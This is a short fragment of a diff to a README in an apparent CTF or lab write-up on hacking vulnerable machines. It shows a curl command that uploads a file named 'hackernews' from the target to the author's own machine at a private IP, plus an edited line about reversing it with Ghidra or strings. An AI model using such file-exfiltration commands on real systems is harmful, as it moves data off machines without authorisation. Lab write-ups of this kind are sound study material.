BaadMaro/Hacking-vulnerable-machines/Thehackernewsbdarijav1/README.md

 Send it to my machine using curl : curl -X POST -F "files=@hackernews" http://192.168.1.108:8000/upload

-I starting doing some reversing using ghidra
+I starting doing some reversing using ghidra //easist way is using strings

 Main